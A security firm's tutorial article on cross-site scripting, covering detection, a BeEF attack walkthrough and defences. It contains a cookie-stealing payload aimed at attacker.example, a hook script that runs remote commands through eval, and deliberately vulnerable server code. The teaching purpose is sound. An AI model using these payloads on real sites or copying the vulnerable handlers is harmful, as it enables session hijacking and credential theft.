As providers of penetration testing services, one of our key roles at SureCloud is to provide hazard risk management services to our clients: highlighting areas that might be cultivating risk, identifying vulnerabilities, and then making plans for risk remediation. Cross-site scripting is just one of the threats that businesses need to be aware of when building their cybersecurity programme.
What is cross-site scripting?
Cross-Site Scripting (XSS) is an attack that causes malicious scripts to be executed in a user’s browser via a vulnerable application. It occurs when the application does not correctly validate or encode input that a user provides. This allows dangerous characters to be entered, which are then returned in the response and executed just as if they had come from the application itself. Exploitation normally involves tricking the user into visiting a malicious page or clicking a malicious link. Cross-Site Scripting currently sits at number 3 on OWASP’s Top 10 list.
There are three types of XSS: reflected, persistent (stored) and DOM-based. For this investigation, we’ll be focusing on reflected and persistent XSS.
Security professionals normally demonstrate this vulnerability by launching an alert pop-up box; in reality, however, XSS can be far more dangerous.
Detection of XSS
To conduct XSS, an attacker must first find a vulnerable website. Automated scanners can be used to find XSS vulnerabilities by entering XSS payloads into all user-controlled data. The scanner then monitors the response to ascertain whether the payload was returned in full and whether it was sanitised or encoded. If the payload is returned unmodified, the parameter is likely vulnerable to XSS. This method generates a lot of traffic, as several different payloads are entered into every piece of user-controlled data.
Manual testing involves entering payload strings and then tweaking them in order to bypass any sanitisation that is carried out. It can be more time-consuming than automated scanning; however, it is often less noticeable.
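As a rough illustration of the reflection check described above, the sketch below probes a single parameter with a marker string and inspects the response; a real scanner would try many payloads and contexts. The helper name is ours, and the target is the example site used throughout this article.

    // Minimal reflected-XSS probe (Node 18+, using the global fetch API).
    // A unique marker containing HTML metacharacters is injected into one parameter.
    const MARKER = '"><zqx9>';

    async function checkReflection(baseUrl, param) {
      const url = `${baseUrl}?${param}=${encodeURIComponent(MARKER)}`;
      const body = await (await fetch(url)).text();
      if (body.includes(MARKER)) {
        console.log(`${param}: probe reflected unencoded - likely XSS candidate`);
      } else if (body.includes('&quot;&gt;&lt;zqx9&gt;')) {
        console.log(`${param}: probe reflected, but HTML entity encoded`);
      } else {
        console.log(`${param}: probe not reflected in the response`);
      }
    }

    checkReflection('https://thisisanexamplewebsite.com/', 'id').catch(console.error);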
Reflected XSS
Reflected XSS is the least severe form of XSS. It normally involves sending a victim a malicious URL whose payload is returned in the response, causing the script to execute in their browser. In this example, the “id” parameter is vulnerable to XSS.
- thisisanexamplewebsite.com?id=<script>alert%281%29</script>
The script is only executed once, unless the URL is visited several times (e.g. by hitting the “back” button), and only in the context of the user who clicks it.
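To show why a URL like the one above executes script, here is a hypothetical sketch of the kind of server-side code that produces a reflected XSS: an Express-style handler that echoes the “id” parameter straight into the page.

    // Hypothetical Express route that reflects the "id" parameter without encoding.
    const express = require('express');
    const app = express();

    app.get('/', (req, res) => {
      const id = req.query.id || '';
      // VULNERABLE: user input is concatenated straight into the HTML response,
      // so ?id=<script>alert(1)</script> executes in the visitor's browser.
      res.send(`<html><body><p>Results for item ${id}</p></body></html>`);
    });

    app.listen(8080);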
Stored XSS / Persistent XSS
Stored XSS is significantly more dangerous and normally occurs in forums or group calendars within an application, where user input is stored and can be viewed by all users. It represents a high risk because the attacker doesn’t need to send out any links; they simply enter the payload into a vulnerable page. Any user who views that page has the script executed in their browser, and it executes every time they visit.
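As a hypothetical illustration, a forum-style page that stores comments and echoes them back without encoding is persistently exploitable in exactly this way:

    // Hypothetical comment board: the payload is saved once and then
    // executes for every user who views the page.
    const express = require('express');
    const app = express();
    app.use(express.urlencoded({ extended: false }));

    const comments = [];  // in-memory store, for illustration only

    app.post('/comments', (req, res) => {
      comments.push(req.body.comment);  // stored without validation or encoding
      res.redirect('/comments');
    });

    app.get('/comments', (req, res) => {
      // VULNERABLE: stored comments are inserted into the HTML verbatim.
      res.send(`<html><body>${comments.map(c => `<p>${c}</p>`).join('')}</body></html>`);
    });

    app.listen(8080);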
What can an attacker actually do with XSS?
Depending on how skilled the attacker is, almost anything is possible with XSS. In this example, we will show how XSS can be used to gain control of the user’s session and the underlying host.
STEP 1: Finding a vulnerable page
Using automated tools or manual testing, an attacker has found the vulnerable “id” parameter on a company’s main web application.
- thisisanexamplewebsite.com?id=<script>alert%281%29</script>
STEP 2: Constructing the URL
Several different payloads can be sent via XSS. Some redirect the user to a malicious page, while others steal cookies and send them to the attacker.
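As a simple illustration, a classic cookie-stealing payload looks something like the following (the attacker domain is a placeholder):

    <script>
      // Sends the victim's cookies to an attacker-controlled server as an image request.
      // This only works if the session cookie has not been marked HttpOnly.
      new Image().src = 'https://attacker.example/steal?c=' + encodeURIComponent(document.cookie);
    </script>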
In this case, we will use BeEF (the Browser Exploitation Framework) to exploit the XSS.
We know that the id parameter is vulnerable to XSS, so we enter the payload there.
- thisisanexamplewebsite.com?id=<script%20src=%22attackercontrolledswebsite.com/hook.js%22></script>
This payload causes the victim’s browser to load the “hook.js” JavaScript file from the attacker-controlled web server (in this demonstration, the BeEF instance listening on 127.0.0.1:3000). This JavaScript file allows us to perform various actions in the user’s browser.
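BeEF’s real hook.js is considerably more sophisticated, but conceptually a hook script simply keeps the victim’s browser talking to the attacker’s server. The sketch below is a simplified, hypothetical illustration of that idea, not BeEF’s actual code; the endpoints are placeholders and the attacker’s server is assumed to permit cross-origin requests.

    // Simplified illustration only - not BeEF's actual hook.js.
    // The hooked browser repeatedly polls the attacker's server for commands,
    // runs them, and posts the results back.
    (async function hook() {
      while (true) {
        try {
          const cmd = await (await fetch('https://attacker.example/command')).text();
          if (cmd) {
            const result = eval(cmd);  // run whatever the attacker sends
            await fetch('https://attacker.example/result', { method: 'POST', body: String(result) });
          }
        } catch (e) {
          // ignore errors and keep polling
        }
        await new Promise(resolve => setTimeout(resolve, 5000));  // poll every 5 seconds
      }
    })();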
STEP 3: Sending the URL
The next step involves sending the malicious link to the victims. Company email addresses are readily found through online search engines, or they can be guessed from employee information if the general structure is known (firstname.lastname@vulnerablesite.com, for example).
STEP 4: The Hook
Once we send out the link, we have to wait for someone to click it. When someone does, we should see their IP address appear in our instance of BeEF, indicating that their browser has been hooked.
STEP 5: Exploitation of Web Application
Now that we have the browser hooked, we can launch a variety of exploits to compromise the session and underlying host.
Firstly, we can view the user’s cookies. This is only possible if the application has not set the HttpOnly flag on its cookies (the Secure flag should also be set so cookies are never sent over unencrypted HTTP). If the session cookie can be read, it will likely be possible to impersonate the user’s session.
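On the defensive side, setting these flags is straightforward. As a hypothetical Express example:

    // Hypothetical Express route issuing a session cookie with protective flags.
    const express = require('express');
    const app = express();

    app.get('/login', (req, res) => {
      const sessionToken = 'example-token';  // placeholder value
      res.cookie('session', sessionToken, {
        httpOnly: true,    // scripts (including XSS payloads) cannot read the cookie
        secure: true,      // never sent over unencrypted HTTP
        sameSite: 'strict' // not sent on cross-site requests
      });
      res.send('Logged in');
    });

    app.listen(8080);

With HttpOnly set, the injected script can still abuse the hooked browser, but it cannot read the session cookie itself.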
We can then set up a man-in-the-browser attack, where all of the user’s traffic is routed through our instance of BeEF. Using this, it is possible to capture all interaction between the user and the application, including the submission of authentication forms.
It is also possible to load various fake pop-ups in the user’s browser. These can be tailored to the target and used to trick users into entering their authentication details.
STEP 6: Exploitation of the Underlying Host
BeEF contains several modules aimed at gaining access to the user’s underlying host. These mainly involve fake Flash updates or messages pretending to be update requests from the browser, and they can be customised to point to an attacker-controlled executable. Once that executable is downloaded and run, it can establish a connection back to the attacker, giving them full access to the host.
Defence
Sanitise all user-controllable (untrusted) data before it is inserted into the response body. Sanitisation must be appropriate for the location where the data is being inserted (a simple encoding sketch follows this list). For example:
- HTML body (e.g. <div>…HERE…</div>) – HTML entity encoding
- Safe HTML attributes (e.g. <input value="…HERE…">) – HTML entity encoding (attribute must also be quoted)
- JavaScript (e.g. <script>someFunction('…HERE…');</script>) – JavaScript hex or Unicode encoding (string variables must be quoted, others validated as their expected data type)
- CSS (e.g. <div style="width: …HERE…;">) – CSS hex encoding (also ensure URLs always start with 'http')
- URL GET parameter (e.g. <a href="…HERE…">) – URL encoding
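As a minimal sketch of HTML entity encoding for the first two contexts above (the helper name is ours; prefer the built-in encoding offered by your framework or templating engine where available):

    // Minimal HTML entity encoder for the HTML body and quoted-attribute contexts.
    function encodeHtml(untrusted) {
      return String(untrusted)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#x27;');
    }

    // Example: the reflected "id" payload from earlier, rendered harmlessly.
    console.log(encodeHtml('<script>alert(1)</script>'));
    // => &lt;script&gt;alert(1)&lt;/script&gt;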
Avoid inserting data into locations other than those above (for example: HTML comments). Other locations may require different forms and levels of sanitisation that must be very carefully considered.
If the untrusted data itself is HTML markup (and you therefore cannot do HTML entity encoding because the page needs to process the data as HTML), utilise a well-known and thoroughly tested HTML markup sanitiser. See the referenced OWASP article for suggestions.
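For example, DOMPurify is one widely used client-side sanitiser; the snippet below is an illustration only, and the element ID is a placeholder.

    // Illustration using DOMPurify to clean untrusted HTML before rendering it.
    import DOMPurify from 'dompurify';

    const untrustedHtml = '<p>Hello</p><img src=x onerror="alert(1)">';
    const cleanHtml = DOMPurify.sanitize(untrustedHtml);  // strips the onerror handler
    document.getElementById('comment').innerHTML = cleanHtml;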
In addition to the above, all user-controllable values should be appropriately validated against what is expected (type, length, format, etc.) on input, before being reinserted into the page or stored for later processing/return. This adds an additional layer of protection that reduces the likelihood of many similar injection vulnerabilities.
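For instance, if the “id” parameter from the earlier examples is expected to be a numeric identifier, a hypothetical validation check might look like this:

    // Hypothetical validation for the "id" parameter: accept only the expected format.
    const express = require('express');
    const app = express();

    function isValidId(value) {
      return typeof value === 'string' && /^\d{1,10}$/.test(value);  // 1-10 digit identifier
    }

    app.get('/', (req, res) => {
      if (!isValidId(req.query.id)) {
        return res.status(400).send('Invalid id');  // reject rather than reflect
      }
      // The value is digits only, but it should still be encoded on output.
      res.send(`<html><body><p>Results for item ${req.query.id}</p></body></html>`);
    });

    app.listen(8080);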
Consider implementing a Content Security Policy (CSP) to prevent resources (e.g. JavaScript and CSS) from being loaded from unapproved domains and to restrict inline scripts.
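As an illustration, a restrictive policy could be set via a response header along the following lines; the directive values are examples only and must be tailored to the application.

    // Illustrative Express middleware setting a restrictive Content Security Policy.
    const express = require('express');
    const app = express();

    app.use((req, res, next) => {
      res.setHeader(
        'Content-Security-Policy',
        "default-src 'self'; script-src 'self'; object-src 'none'"
      );
      next();
    });

    app.listen(8080);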
What’s next?
At SureCloud, we specialise in making these sorts of attacks known to our clients. Our penetration testing services can assist in detecting vulnerabilities within your human and digital systems, helping you put your best foot forward in improving your security plans. To kickstart your hazard risk management transformation, take a look at our cybersecurity offerings.